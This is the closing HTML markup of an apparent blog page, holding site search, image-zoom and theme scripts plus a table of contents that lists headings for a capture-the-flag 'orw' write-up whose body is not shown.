            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#orw%E5%9F%BA%E7%A1%80"><span class="nav-number">1.</span> <span class="nav-text">orw基础</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98"><span class="nav-number">2.</span> <span class="nav-text">例题</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80"><span class="nav-number">2.1.</span> <span class="nav-text">基础</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC"><span class="nav-number">2.1.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#HGAME-2023-week1-orw"><span class="nav-number">2.2.</span> <span class="nav-text">[HGAME 2023 week1]orw</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-1"><span class="nav-number">2.2.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XYCTF-orw"><span class="nav-number">2.3.</span> <span class="nav-text">XYCTF orw</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
            
<script src="/js/post/share.js"></script>

        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
